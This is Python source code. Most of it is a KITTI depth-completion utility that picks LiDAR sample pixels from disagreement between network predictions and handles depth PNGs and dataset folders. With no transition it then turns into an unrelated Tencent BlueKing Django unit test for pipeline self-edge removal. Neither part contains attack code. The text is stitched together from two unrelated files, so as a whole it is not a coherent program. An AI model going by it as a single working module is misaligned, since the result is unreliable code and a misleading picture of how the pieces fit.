        glob_d = "".join(current_depth_dir + '/data_depth_velodyne/test/*_sync/proj_depth/velodyne_raw/image_0[2,3]/*.png')
        paths_d = sorted(glob.glob(glob_d))
        glob_gt = "".join('../data_new/phase_1/mini_set_1/data_depth_annotated/test/*_sync/proj_depth/groundtruth/image_0[2,3]/*.png')
        paths_gt = sorted(glob.glob(glob_gt))
        glob_d_pred = "".join(current_pred_dir + '/NN*/data_depth_velodyne/test/*_sync/proj_depth/velodyne_raw/image_0[2,3]/*.png')
        paths_d_pred = sorted(glob.glob(glob_d_pred), key=lambda x: x.split('test/')[1])
        predictions = num_of_NN
        num_different_images = int(len(paths_d_pred) / num_of_NN)
        assert len(paths_d_pred) == len(paths_gt) * num_of_NN, "create_custom_depth_maps: there are not enough predictions per image for test"
    # --- per-image: gather all NN predictions, pick new samples, write next velodyne map ---
    paths_d_pred_itr = iter(paths_d_pred)
    for image in range(num_different_images):
        predictions_of_same_image = []  # will be: [num_of_images][row][col]
        for i in range(predictions):
            predictions_of_same_image.append(depth_read(next(paths_d_pred_itr)))
        # creating inputs for lidar_choose function
        h, w = predictions_of_same_image[0].shape  # should be 352x1216
        reshaped_predictions_of_same_image = np.asarray([np.reshape(predictions_of_same_image[j], (h * w, 1)) for j in range(predictions)])
        reshaped_predictions_of_same_image = (reshaped_predictions_of_same_image.squeeze(axis=2)).transpose()  # shape should be: (h*w, predictions)
        current_gt = depth_read(paths_gt[image])  # should be bigger than 352x1216 if train, else exactly 352x1216 (validation & test sets came from val_select_cropped)
        # bottom-center crop of the gt to 352x1216
        m = current_gt.shape[0] - 352
        n = int(round((current_gt.shape[1] - 1216) / 2.))
        current_gt = current_gt[m:(m + 352), n:(n + 1216)]
        if (phase == 1) and (not first_phase_rgbd):  # no d inputs
            valid_mask = np.reshape(current_gt.copy(), (h * w, 1))  # the whole gt samples are valid, changing to a vector
            current_velodyne = np.zeros(current_gt.shape)  # we don't have samples yet
        else:  # cropping, make sure we don't give option to sample pixels that we've already sampled, changing to a vector
            current_velodyne = depth_read(paths_d[image])  # should be 352x1216 because our predictions are already cropped and we made the last velodyne to be the same shape as them
            if first_phase_rgbd and current_velodyne.shape[0] != 352:  # if first phase is RGBD so we just need to be sure the first d-maps (with 0 samples) are in the right shape
                current_velodyne = np.zeros(current_gt.shape)
                if phase > 1:
                    print("Create map: should not enter here after first phase")
                    exit()
            assert current_velodyne.shape == current_gt.shape, "'create_custom_depth_maps' function: current_velodyne & current_gt shapes are different"
            valid_mask = current_gt.copy()
            valid_mask[current_velodyne > 0] = 0  # can be 0 or -1, lidar_choose doesn't care. if we have valid samples in velodyne we don't want to choose them again
            valid_mask = np.reshape(valid_mask, (h * w, 1))
            current_velodyne[current_velodyne <= 0] = 0  # keep only valid samples (pixels that are >=0)
        # choose the disagreement measure to match the training metric
        if metric == 'rmse':
            inds_to_sample_next, prob_only_valid_for_next_sampling, x = lidar_choose(reshaped_predictions_of_same_image, valid_mask.squeeze(), budget, 'var', samp_method)
        elif metric == 'mae':
            inds_to_sample_next, prob_only_valid_for_next_sampling, x = lidar_choose(reshaped_predictions_of_same_image, valid_mask.squeeze(), budget, 'median', samp_method)
        else:
            print("Wrong criterion, exiting...")
            exit()
        if inds_to_sample_next.size != 0:  # we have samples
            next_velodyne = np.reshape(np.zeros((h, w)), (h * w, 1))  # vector of zeros (non valid depth)
            inds_to_sample_next = np.expand_dims(inds_to_sample_next, 0).transpose()
            next_velodyne[inds_to_sample_next] = np.reshape(current_gt, (h * w, 1))[inds_to_sample_next]
            next_velodyne = np.reshape(next_velodyne, (h, w))
            next_velodyne = next_velodyne + current_velodyne  # we want to add the previous samples
        else:  # we don't have (already took all valid samples), take current velodyne instead
            next_velodyne = current_velodyne
        # NOTE(review): `i` below is the last inner-loop index
        # (predictions - 1), i.e. the last NN's prediction path is used
        # to derive the output filename — confirm the path suffix is
        # identical across NN* directories
        if 'val_select' in current_pred_dir:
            filename = current_pred_dir.split('/predictions_tmp_val_select')[0] + '/depth_selection' + paths_d_pred[((predictions) * image) + i].split('/depth_selection')[1]
        else:
            filename = current_pred_dir.split('/predictions_tmp')[0] + '/data_depth_velodyne' + paths_d_pred[((predictions) * image) + i].split('/data_depth_velodyne')[1]
        os.makedirs(os.path.dirname(filename), exist_ok=True)
        depth_write(filename, next_velodyne)  # if we've opened with depth_read, we need to save with depth_write. This will be cropped
        if save_probs_and_sample_maps == True:  # to debug or look at the semi-results (only on mini-set 1)
            if 'val_select' in current_pred_dir:
                print("create_custom_depth_maps: save probs and sample maps of val_select is not available yet. Need to make some modifications. Continue without saving...")
                continue
            elif filename.split('set_')[1].split('/')[0] != '1':  # we are saving only things in miniset-1
                continue
            next_velodyne[next_velodyne > 0] = 1
            ps = paths_gt[image].split('/')
            if is_test:
                rgb_path = '/'.join(ps[:-7] + ['data_rgb'] + ps[-6:-4] + ps[-2:-1] + ['data'] + [ps[-1:][0].replace('groundtruth_depth', 'image')])
            else:
                rgb_path = '/'.join(ps[:-7] + ['data_rgb'] + ps[-6:-4] + ps[-2:-1] + ['data'] + ps[-1:])
            x_only_gt_valid = np.reshape(x.copy(), (h, w))  # will be only valid
            x_only_gt_valid[current_gt < 0] = 0
            show_prob_map_and_sampling_indices_on_image(phase, rgb_path, next_velodyne, np.reshape(x / np.sum(x), (h, w)),
                                                        x_only_gt_valid, show_results=False, save_results=True)  # if want the variance map, take x instead of x / np.sum(x)
"""
Chooses the next samples to be fed to the NN during train phase.
Input:
scores: shape - depth_samples_col_vec x num_sources depth predictions. the user should turn each depth samples image (the input to the NN) to a column vector
valid_mask: mask image of all relevant pixels to be chosen, as a vector. We don't want to choose points where either the value is not known or that were chosen already. >0 means valid (to choose), <=0 invalid.
budget: how many points to sample this time
method: two options: 'var', 'median'
    pm_greedy - choose whether to use probability matching ('pm', sample based on the probability map) or greedy ('greedy', MAX - highest probabilities)
Output:
inds: Chosen indices.
prob: A map of the pixels probability (to be chosen).
x: the values related to the chosen method.
Example:
for total of 5 NN, meaning we compare 4 outputs to a single one: inds,prob,x = lidar_choose(scores, mask, budget=1024, method='var',
quantile_discard=[0.25,0.75], pm_greedy='pm')
"""
def lidar_choose(scores, valid_mask, budget, method, pm_greedy):
    """Choose the next pixel indices to sample, based on disagreement between depth predictors.

    Inputs:
        scores: (n, k) array - k depth predictions per pixel (each depth-samples image flattened to a column).
        valid_mask: (n,) vector; >0 marks pixels that may still be chosen, <=0 invalid (unknown / already chosen).
            NOTE: modified in place when the uniform-random fallback path is taken.
        budget: number of points to sample this round.
        method: 'var' (L2-like: per-pixel variance), 'quantiles' (squared min-max spread),
            or 'median' (L1-like: mean absolute deviation from the median).
        pm_greedy: 'pm' samples according to the probability map; 'greedy' takes the highest-scoring pixels.
    Returns:
        (inds, prob, x): chosen indices, the normalized valid-only probability map
        (empty array when there is none), and the raw per-pixel disagreement values.
    """
    # 'quantiles' is implemented below; it used to be blocked by this assert (dead branch).
    assert method in ['var', 'quantiles', 'median'], "unknown method:" + method
    assert pm_greedy in ['pm', 'greedy'], "unknown pm_greedy:" + pm_greedy
    assert scores.shape[0] == valid_mask.shape[0], "scores.shape[0] != valid_mask.shape[0]"
    assert np.all(scores >= 0.), "negative predictions found!"  # message fixed: zero passes the check
    n, k = scores.shape
    scores = np.sort(scores, axis=1).astype('float32')  # sort each pixel's depth predictions, small to large
    if method == 'var':  # relates to L2
        x = np.var(scores, axis=1).astype('float32')
    elif method == 'quantiles':
        x = (scores[:, -1] - scores[:, 0]) ** 2  # squared spread between the extreme predictions
    elif method == 'median':  # relates to L1
        med = np.median(scores, axis=1)  # median of an even-length row is the mean of the two middle values
        medians = np.transpose(np.tile(med, (scores.shape[1], 1)))
        x = np.mean(np.absolute(scores - medians), axis=1)
    else:
        # Unreachable after the assert above; fail loudly instead of the old no-op `assert (1)`.
        raise ValueError("unknown method:" + method)
    prob_only_valid = x.copy()  # will contain cues where it's best to sample (based on the predictors)
    # give zero prob to invalid points
    bad_inds, = np.where(valid_mask <= 0)
    good_inds = scores.shape[0] - bad_inds.shape[0]  # number of pixels we may sample from
    prob_only_valid[bad_inds] = 0.
    s = np.sum(prob_only_valid)
    if budget > good_inds:  # we want to sample more than we can
        print("Warning: lidar_choose: taking {} instead of {} samples, because not enough valid pixels to sample from gt".format(good_inds, budget))
        budget = good_inds
    if budget == 0:  # nothing to sample
        prob_only_valid = np.array([])  # nothing is valid. We don't have a valid prob map
        return (np.array([]), prob_only_valid, x)
    if budget > prob_only_valid[prob_only_valid > 0].shape[0]:  # not enough nonzero-probability pixels; part of the budget must be uniform-random
        budget_prob = prob_only_valid[prob_only_valid > 0].shape[0]
        budget_rand = budget - budget_prob  # prob map == 0 for them
        print("Warning: lidar_choose: only {} different valid pixels to sample from (probability map is zero elsewhere). {} remaining samples will be taken randomly uniform from {} "
              "valid pixels".format(budget_prob, budget_rand, good_inds-budget_prob))
        if budget_prob != 0:  # sample based on the probability map
            prob_only_valid = prob_only_valid / s
            if pm_greedy == 'pm':
                inds1 = np.random.choice(n, budget_prob, False, prob_only_valid)  # budget_prob indices, no replacement, weighted by prob
            else:  # greedy-MAX
                inds1 = np.argpartition(prob_only_valid, -budget_prob)[-budget_prob:]  # 'budget_prob' max indices of 'prob'
            # remove indices we took already (both modes), so the uniform fallback cannot re-pick them
            valid_mask[inds1] = 0
        else:  # everything valid has zero probability - take only random samples
            prob_only_valid = np.array([])  # we don't have a valid prob map
            inds1 = np.array([]).astype('int')
        # sample the remainder uniformly - no matter PM or greedy (all weights equal)
        valid_mask[valid_mask > 0] = 1
        valid_mask[valid_mask < 0] = 0
        valid_mask = valid_mask / valid_mask.sum()  # uniform
        inds2 = np.random.choice(n, budget_rand, False, valid_mask)
        return (np.concatenate([inds1, inds2]), prob_only_valid, x)
    else:  # enough pixels in prob_map
        prob_only_valid = prob_only_valid / s
        if pm_greedy == 'pm':
            inds = np.random.choice(n, budget, False, prob_only_valid)
        else:  # greedy-MAX
            inds = np.argpartition(prob_only_valid, -budget)[-budget:]
        return (inds, prob_only_valid, x)
"""
Saves depth image as uint16
"""
def depth_write(filename, img):
    """Save a depth image as a 16-bit PNG (KITTI convention: stored value = depth * 256, 0 = no depth).

    Negative depth is treated as 0; values above the uint16 range are truncated with a warning.
    The caller's array is no longer mutated in place (the old `img[img < 0] = 0` was a side effect).
    """
    img = np.maximum(img, 0)  # negative depth is like 0 depth; returns a copy instead of mutating the input
    img = img * 256
    if np.max(img) >= 2 ** 16:
        print('Warning: {} pixels in {} have depth >= 2**16 (max is: {}).Truncating before saving.'.format(img[img >= 2**16].shape[0], "/".join(filename.split('/')[-5:]), np.max(img)))
        img = np.minimum(img, 2 ** 16 - 1)
    img = img.astype('uint16')
    cv2.imwrite(filename, img)
"""
Loads depth map D from png file and returns it as a numpy array,
"""
def depth_read(filename):
    """Load a KITTI 16-bit depth PNG and return it as a float numpy array (depth in meters).

    The PNG stores depth * 256 as uint16; a stored 0 means "no measurement" and is returned as -1.
    """
    depth_png = np.array(Image.open(filename), dtype=int)
    # make sure we have a proper 16bit depth map here.. not 8bit!
    # NOTE(review): a 16-bit PNG can never exceed 65535, so this only fires for other inputs
    # (e.g. degenerate NN predictions / black images) - confirm the intended threshold.
    if np.max(depth_png) > 65536:
        print("warning: max depth {} in while reading image{} in depth_read".format(np.max(depth_png), filename))
    depth = depth_png.astype(float) / 256.  # np.float was removed in NumPy 1.24; use builtin float
    depth[depth_png == 0] = -1.
    return depth
"""
Given a kitti dir, and a type ('train'/'val'), return a list of drives and a map from drive name to the number of images in the drive. The number of images is 2* the number in the image_02 dir
"""
def get_train_val_drive_list(src_path, dir_type):
    """Return (drives, img_count) for a KITTI dir and a type ('train'/'val').

    img_count maps each drive name to the number of .png files in it
    (2x the number in the image_02 dir); drives are the keys of that map.
    """
    assert (dir_type in train_and_val())
    # the drive listing is taken from data_depth_annotated
    dirname = src_path + '/' + get_train_val_type_dirs()[0] + '/' + dir_type
    img_count = {}
    for drive in os.listdir(dirname):
        pngs = Path(dirname + '/' + drive).rglob('*.png')
        img_count[drive] = len(list(pngs))
    return (list(img_count.keys()), img_count)
"""
Copy some of the drives in the train or val
Inputs:
src_path - for example, the full kitti
dest_path - a partial kitti being built
drive_list - a list of drive directories (e.g. '2011_09_26_drive_0001_sync'). the list is unique.
set_type - 'train' or 'val'
dirs - if None, all the 3 top dirs (get_train_val_type_dirs()). otherwise, a subset of those.
IMPORTANT: dirs = None is intended for building a new directory from scratch, and will not allow
stepping on existing content. dirs != None is intended for such stepping and will allow it.
The user is then responsible for keeping directory valid (same drives in all)
if drives do not exist, a warning will be printed.
"""
def copy_partial_train_val(src_path, dest_path, drive_list, set_type, dirs=None):
    """Copy some of the drives of the train or val split from src_path to dest_path.

    dirs=None copies all three top-level type dirs and refuses to overwrite existing
    content; an explicit dirs subset allows overwriting (the user keeps the tree valid).
    Prints a warning for drives that do not exist.
    """
    assert (set_type in train_and_val())
    if dirs is None:
        dirs = get_train_val_type_dirs()
        dirs_exist_ok = False
    else:
        assert (len(dirs) > 0)
        for type_dir in dirs:
            assert (type_dir in get_train_val_type_dirs())
        dirs_exist_ok = True
    # de-duplicate the requested drives
    for drive in set(drive_list):
        copied_everywhere = True
        for type_dir in dirs:
            cur_src = os.path.join(src_path, type_dir, set_type, drive)
            cur_dest = os.path.join(dest_path, type_dir, set_type, drive)
            if not os.path.isdir(cur_src):
                copied_everywhere = False
                continue
            if dirs_exist_ok:
                # we must be replacing an existing directory
                assert os.path.isdir(cur_dest)
                shutil.rmtree(cur_dest)
            shutil.copytree(cur_src, cur_dest)
        if not copied_everywhere:
            print('Warning: invalid drive ' + drive)
"""
Create the kitti skeleton - all dirs (without the drives), no data. root_path string must be new (it will create the folder itself)
"""
def create_dir_tree_skeleton(root_path, example_path):
    """Create the KITTI directory skeleton - all dirs (without drives), no data.

    root_path must be new (it is created here); example_path supplies the
    depth_selection sub-tree layout to mirror.
    """
    if os.path.exists(root_path):
        print('path ' + root_path + ' already exists. Exiting.')
        return
    if not os.path.isdir(example_path):
        # fixed: missing space made the message read "<path>is not a directory..."
        print(example_path + ' is not a directory or does not exist. Exiting.')
        return
    for type_dir in get_train_val_type_dirs():
        for subdir in train_and_val_and_test():
            dirname = root_path + '/' + type_dir + '/' + subdir
            os.makedirs(dirname)
    # mirror the depth_selection sub-tree of the example
    for root, dirs, files in os.walk(example_path + '/depth_selection'):
        for name in dirs:
            dirname = root_path + '/' + root[len(example_path) + 1:] + '/' + name
            os.makedirs(dirname)
def train_and_val():
    """Return the dataset split names that have drive subdirectories."""
    splits = ['train', 'val']
    return splits
def train_and_val_and_test():
    """Return all dataset split names, including the test split."""
    splits = ['train', 'val', 'test']
    return splits
"""
Divide drives into mini-sets. Iterate over the drives (ordered by number of images) and allocate each drive to the
currently smallest mini-set, until every set holds at least min_imgs_per_set images for the first time (the returned
flag reports success/failure). Once a set reaches the minimum, nothing more is added to it.
(Note that the count refers to the ground truth, which has 10 fewer images than the RGB data.)
Inputs:
    src_path, dir_type - as in get_train_val_drive_list
    add_descending - True adds the largest drives first, which is good for the whole set or a big portion of it.
    If False, good for creating small mini-sets (for small runs).
"""
def divide_drives_to_mini_sets(n_sets, min_imgs_per_set, src_path, dir_type, add_descending=True):
    """Greedily split drives into n_sets mini-sets of at least min_imgs_per_set images each.

    Drives are handled in ascending (or, with add_descending=True, descending) image-count
    order; each drive joins the currently smallest set. Returns (sets, sizes, success).
    """
    drives, img_count = get_train_val_drive_list(src_path, dir_type)
    keys = list(img_count.keys())
    values = list(img_count.values())
    order = np.argsort(np.array(values))
    # drive names and their image counts, both sorted ascending by count
    drives_sorted_by_nums = [keys[j] for j in order]
    nums_sorted = sorted(values)
    success = False
    sets = [[] for _ in range(n_sets)]
    sizes = np.zeros(n_sets, dtype='int')
    indices = np.arange(0, len(nums_sorted))
    if add_descending:  # bigger syncs first
        indices = indices[::-1]
    for i in indices:
        smallest = np.argmin(sizes)
        if sizes[smallest] >= min_imgs_per_set:
            # the smallest set is already full, so every set is - we are done
            success = True
            break
        sets[smallest].append(drives_sorted_by_nums[i])
        sizes[smallest] += nums_sorted[i]
    return (sets, sizes, success)
"""
return the names of the directories with train/val subdirectories
"""
def get_train_val_type_dirs():
    """Return the names of the top-level directories that contain train/val subdirectories."""
    type_dirs = ['data_depth_annotated', 'data_depth_velodyne', 'data_rgb']
    return type_dirs
"""
Given a directory name (user's responsibility that it is a directory), return the elements in a-b order.
"""
def get_sorted_ls(src_path):
    """Return the entries of directory src_path in ascending alphabetical order.

    It is the caller's responsibility that src_path is a directory.
    """
    entries = os.listdir(src_path)
    entries.sort()
    return entries
"""
Copy files in the val_selection_cropped folder.
Inputs:
    src_path - for example, the full KITTI dataset
    dest_path - a partial KITTI dataset being built
    subset_params - either a range or a drive list. If it is a range, it is a list [start, end] and files start:end are
    copied in alphabetical order; the range must be valid (from 0 to n, where n is the total number of files).
    Otherwise it is expected to be a list of drive names (e.g. '2011_09_26_drive_0001_sync') whose files are copied;
    duplicates in the list are removed.
    A warning is printed for drives that do not exist.
"""
def copy_partial_val_selection_cropped(src_path, dest_path, subset_params):
    """Copy a subset of depth_selection/val_selection_cropped from src_path to dest_path.

    subset_params is either [start, end] (ints) - copy that alphabetical file range from every
    subdirectory - or a list of drive-name strings whose files are copied. Empty params are
    invalid. Prints a warning for drives that have no files.
    """
    vsc_suf = os.path.join('depth_selection', 'val_selection_cropped')
    if len(subset_params) == 0:
        # was a no-op `assert 1, 'invalid params'` that could never fire; now actually fails
        raise ValueError('copy_partial_val_selection_cropped: invalid params')
    # e.g. ['velodyne_raw', 'image', 'groundtruth_depth', 'intrinsics']
    dirnames = os.listdir(os.path.join(src_path, vsc_suf))
    if not isinstance(subset_params[0], str):  # images range
        # NOTE(review): os.listdir order is arbitrary; the file count is assumed equal across subdirs
        n = len(os.listdir(os.path.join(src_path, vsc_suf, dirnames[0])))  # files per subdir (should be 1000)
        start, end = subset_params
        if start < 0 or end > n:
            sys.exit('copy_partial_val_selection_cropped: invalid range')  # probably there are not enough images to copy
        for dirname in dirnames:
            for filename in get_sorted_ls(os.path.join(src_path, vsc_suf, dirname))[start:end]:
                shutil.copyfile(os.path.join(src_path, vsc_suf, dirname, filename),
                                os.path.join(dest_path, vsc_suf, dirname, filename))
    else:  # drive list
        for drive in set(subset_params):  # make unique
            found = False
            for filename in Path(os.path.join(src_path, vsc_suf)).rglob(drive + '*'):
                found = True
                strname = str(filename)
                shutil.copyfile(strname, os.path.join(dest_path, strname[len(src_path) + 1:]))
            if not found:
                print('Warning: invalid drive: ' + drive)
"""
Copy files and dirs (recursive). If dest exists, will succeed for files but not for dirs. If fails, calls sys.exit().
"""
def copypath(src, dest, overwrite_dest_dir=False):
    """Copy a file, or a directory tree (recursive), from src to dest.

    If dest exists, the copy succeeds for files but not for dirs (unless
    overwrite_dest_dir=True, which removes the existing dest tree first).
    On failure, calls sys.exit() with the underlying error.
    """
    if os.path.isdir(src):
        try:
            if overwrite_dest_dir and os.path.exists(dest):
                shutil.rmtree(dest)
            shutil.copytree(src, dest)
        except OSError as e:  # shutil.Error subclasses OSError; the old bare except hid the cause
            sys.exit('FAILED copytree. Exiting. ({})'.format(e))
    else:
        try:
            shutil.copyfile(src, dest)
        except OSError as e:
            sys.exit('FAILED copyfile. Exiting. ({})'.format(e))
"""
Replace (overwrite) existing depth images with empty (zeros) ones - on KITTI folders tree
"""
def apply_empty_d_maps_to_data(src_path_to_overwrite):
    """Overwrite all existing depth images in a KITTI folder tree with empty (all-zeros) maps."""
    start_time = time.time()
    depth_dirs = ['data_depth_velodyne',
                  os.path.join('depth_selection', 'val_selection_cropped', 'velodyne_raw')]
    for depth_dir in depth_dirs:
        apply_empty_d_maps_to_directory(os.path.join(src_path_to_overwrite, depth_dir))
    print("Finished after {:.2f} hours".format((time.time() - start_time) / 3600))
def apply_empty_d_maps_to_directory(dirpath):
    """Replace every .png under dirpath (recursively) with an empty (zeros) 352x1216 depth map."""
    # Count via pathlib instead of shelling out to `find` (the old os.system string broke on
    # paths with spaces/metacharacters), and reuse the listing for the overwrite loop.
    png_files = list(Path(dirpath).rglob('*.png'))
    print("number of images in folder {}: ".format(dirpath), flush=True)
    # 0 is expected for val_select dirs outside mini-set 1 (they should not be there - so it's ok)
    print(len(png_files), flush=True)
    empty_map = np.zeros((352, 1216), dtype=int)
    for filename in png_files:
        depth_write(str(filename), empty_map)
"""
Can show or save current probability maps (based on the variance map from the predictions) & the current samples on the rgb image
"""
def show_prob_map_and_sampling_indices_on_image(phase, rgb_path, samples_map, prob_map, x_gt_valid, show_results=False, save_results=False):
    """Show or save the current probability maps and the chosen samples drawn on the RGB image.

    Args:
        phase: current phase index (0-based; results are saved under phase_<phase+1>).
        rgb_path: path to the RGB image (under a 'data_rgb' tree).
        samples_map: HxW map of the chosen sample locations.
        prob_map: HxW probability map (based on the variance of the predictions).
        x_gt_valid: HxW method values restricted to valid ground-truth pixels.
        show_results: display the images with matplotlib.
        save_results: save the visualizations under ../data_new/phase_<phase+1>/...
    """
    rgb = rgb_read(rgb_path)
    # crop to the KITTI 352x1216 window: bottom rows, horizontally centered
    m = rgb.shape[0] - 352
    n = int(round((rgb.shape[1] - 1216) / 2.))
    rgb = rgb[m:(m + 352), n:(n + 1216), :]
    samples_on_image = show_img_effect(rgb, samples_map, enlarge_samples=True)
    cmap = plt.cm.get_cmap("jet")  # color map name. Red is higher, blue is lower
    if save_results == True:
        # output path mirrors the rgb path under ../data_new/phase_<k>/
        # NOTE(review): assumes rgb_path has >= 4 components and contains 'data_rgb' - confirm against callers
        path = '../data_new/phase_' + str(phase + 1) + '/' + rgb_path.split('/')[3] + '/prob_and_sampling_maps_results' + rgb_path.split('data_rgb')[1]
        os.makedirs(os.path.dirname(path), exist_ok=True)
        samples_on_image = (255 * samples_on_image).astype('uint8')
        im = Image.fromarray(samples_on_image)
        im.save(path.split('.png')[0] + '_samples.png')
        # normalize to [0, 1] for visualization
        prob_gt_valid = (x_gt_valid - x_gt_valid.min()) / (x_gt_valid.max() - x_gt_valid.min())
        # depth_write(path.split('.png')[0] + '_prob_gt_valid.png', prob_gt_valid) # real values (rather than visualization - in the next lines)
        colored_prob_valid_map = cmap(prob_gt_valid)  # apply the colormap, will result 4-channel image (R,G,B,A) in float [0,1]
        im = Image.fromarray((colored_prob_valid_map[:, :, :3] * 255).astype(np.uint8))  # convert to RGB in uint8
        im.save(path.split('.png')[0] + '_prob_gt_valid.png')
        # np.save(path.split('.png')[0] + '_prob.npy', prob_map) # real values (rather than visualization - in the next lines)
        prob_map = (prob_map - prob_map.min()) / (prob_map.max() - prob_map.min())
        # depth_write(path.split('.png')[0] + '_prob.png', prob_map) # real values (rather than visualization - in the next lines)
        colored_prob_map = cmap(prob_map)  # apply the colormap, will result 4-channel image (R,G,B,A) in float [0,1]
        im = Image.fromarray((colored_prob_map[:, :, :3] * 255).astype(np.uint8))  # convert to RGB in uint8
        im.save(path.split('.png')[0] + '_prob.png')
    if show_results == True:
        plt.close()
        plt.figure(1)
        plt.imshow(samples_on_image)
        plt.figure(2)
        plt.imshow(prob_map)
"""
Combine the original image and an effect of interest into a single image.
Inputs:
rgb: original image HxWx3
effect: image HxW
enlarge_samples: if the effect is a sample map - will enlarge each pixel by 4 different directions: up, down, left, right (for better view later on).
is it only for display purposes because it's changing the data
gs: gray scale image. when given - what 'rgb' argument is non relevant
jet_mode: relevant only for gs. will shot the image in JET colormap, and the effect will show on top of it. Use it only for data that you don't
care for the values of the pixels, just if there is data or not (binary). Excellent for sample map as effect
previous_effect: relevant only when the effect is samples. We'll use the previous_effect to determine what are the new samples
Outputs:
img - returns the effected image.
"""
def show_img_effect(rgb, effect, enlarge_samples=False, gs=None, jet_mode=False, previous_effect=None):
    """Combine an image and an effect of interest (e.g. a sample map) into a single image.

    Inputs:
        rgb: original image HxWx3 (ignored when gs is given).
        effect: HxW effect map; normalized to [0, 1] internally.
        enlarge_samples: dilate each effect pixel into a '+' shape (display only - it changes the data).
        gs: optional HxW gray-scale image; when given, the 'rgb' argument is irrelevant.
        jet_mode: only with gs - show gs in the JET colormap with the effect painted on top of it.
            Binary presence only (values are not shown); excellent for a sample map as effect.
        previous_effect: only when the effect is samples - marks the previously taken samples so
            that only the new ones are highlighted.
    Returns:
        HxWx3 float image (effect in the red channel, gray scale in the green channel,
        unless jet_mode returns the colormapped image).
    """
    def _normalize01(m):
        # map to [0, 1]; an all-constant map means no effect at all
        if m.min() == m.max():
            return np.zeros(m.shape)
        return (m - np.min(m)) / (np.max(m) - np.min(m))

    def _dilate_plus(m):
        # expand every nonzero pixel into a '+' (up/down/left/right), zeroing the
        # wrap-around column/row that the cyclic np.roll introduces at each border
        right = np.roll(m, 1, axis=1)
        right[:, 0] = 0
        left = np.roll(m, -1, axis=1)
        left[:, -1] = 0
        up = np.roll(m, -1, axis=0)
        up[-1, :] = 0
        down = np.roll(m, 1, axis=0)
        down[0, :] = 0
        return m + right + left + up + down

    effect = _normalize01(effect)
    if previous_effect is not None:
        previous_effect = _normalize01(previous_effect)
    if enlarge_samples:
        if previous_effect is not None:
            effect = effect - previous_effect  # keep only what's new
            previous_effect = _dilate_plus(previous_effect)
        effect = _dilate_plus(effect)
    if gs is None:  # rgb image
        assert (rgb.shape[0:2] == effect.shape)
        if np.max(rgb) > 1.:
            rgb = rgb / 255.  # to [0, 1]
        # channel ratios must sum to 1 to get a true gray scale
        gs = np.dot(rgb, [0.299, 0.587, 0.114])
        img = np.zeros(rgb.shape)
    else:  # gray scale image
        img = np.zeros((gs.shape[0], gs.shape[1], 3))
        gs = _normalize01(gs)  # to [0, 1]; also guards the previously unguarded division by zero on a constant gs
        if jet_mode:  # only possible with gs
            cmap = plt.cm.get_cmap("jet")
            colored_gs = cmap(gs)[:, :, :3]  # apply the colormap + keep only RGB in float [0,1]
            if previous_effect is not None:
                # old sample points in gray-ish - binary presence, not value
                colored_gs[previous_effect > 0] = 0.45
            # new sample points in white - binary presence, not value
            colored_gs[effect > 0] = 1
            return colored_gs
    img[:, :, 0] = effect
    img[:, :, 1] = gs
    return img
"""
Get the name of the NN weights, from an output file.
"""
def read_weights(file_path, phases, predictors):
    """Read the names of the NN weights from an output file.

    The file holds one weight name per line; a blank line separates phases, and the single
    entry after the last blank line is the final net's weights.
    Args:
        file_path: path to the .txt file; "" means we are not inferencing and [] is returned.
        phases: expected number of phases (K).
        predictors: expected number of weights per phase (M).
    Returns:
        list of lists: one list of weight names per phase, plus a final one-element list.
    """
    if file_path == "":  # we are not inferencing
        return []
    weights = []
    NN_in_stage = []
    with open(file_path) as f:
        lines = f.read().splitlines()
    # NOTE(review): a blank line just before EOF would append an extra empty stage - confirm file format
    for line in lines:
        if line != "":  # as long as we don't encounter an empty line (which means a new stage)
            NN_in_stage.append(line)
        else:
            weights.append(NN_in_stage)
            NN_in_stage = []
    weights.append(NN_in_stage)  # final net
    for phase in range(len(weights) - 2):
        assert len(weights[phase]) == len(weights[phase+1]), "read_weights: number of weights doesn't match between phases"
    assert len(weights[-1]) == 1, "read_weights: there should be 1 final net weights"
    assert phases == len(weights)-1, "read_weights: given argument K doesn't match the number of given phases in .txt"
    assert len(weights[0]) == predictors, "read_weights: given argument M doesn't match the number of weights inside each phase in .txt"
    print("Detects {} weights in each phase, total {} phases, in addition to {} final net weights\n".format(len(weights[0]), len(weights)-1, len(weights[-1])))
    return weights
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from __future__ import absolute_import
from copy import deepcopy
from django.test import TestCase
from pipeline_web.constants import PWE
from pipeline_web.drawing_new.normalize import normalize_run, normalize_undo
from pipeline_web.drawing_new import acyclic
from pipeline_web.drawing_new.utils import add_flow_id_to_node_io
from pipeline_web.tests.drawing_new.data import pipeline_with_circle
class TestAcyclic(TestCase):
    """Unit tests for pipeline_web.drawing_new.acyclic: self-edge removal/insertion and cycle reversal."""
    def setUp(self):
        # work on a fresh deep copy so each test can mutate the pipeline freely
        self.pipeline = deepcopy(pipeline_with_circle)
    def test_remove_self_flows(self):
        """remove_self_edges strips self-loop flows and returns them; undo restores the original pipeline."""
        normalize_run(self.pipeline)
        # the fixture has no self edges initially
        self.assertEqual(acyclic.remove_self_edges(self.pipeline), {})
        # add two artificial self loops on the first two activities
        edges = {
            'self_edge0': {
                PWE.source: list(self.pipeline[PWE.activities].keys())[0],
                PWE.target: list(self.pipeline[PWE.activities].keys())[0],
            },
            'self_edge1': {
                PWE.source: list(self.pipeline[PWE.activities].keys())[1],
                PWE.target: list(self.pipeline[PWE.activities].keys())[1],
            }
        }
        self.pipeline[PWE.flows].update(edges)
        add_flow_id_to_node_io(list(self.pipeline[PWE.activities].values())[0], 'self_edge0', PWE.incoming)
        add_flow_id_to_node_io(list(self.pipeline[PWE.activities].values())[0], 'self_edge0', PWE.outgoing)
        add_flow_id_to_node_io(list(self.pipeline[PWE.activities].values())[1], 'self_edge1', PWE.incoming)
        add_flow_id_to_node_io(list(self.pipeline[PWE.activities].values())[1], 'self_edge1', PWE.outgoing)
        # now exactly those self edges must be removed and returned
        self.assertEqual(acyclic.remove_self_edges(self.pipeline), edges)
        normalize_undo(self.pipeline)
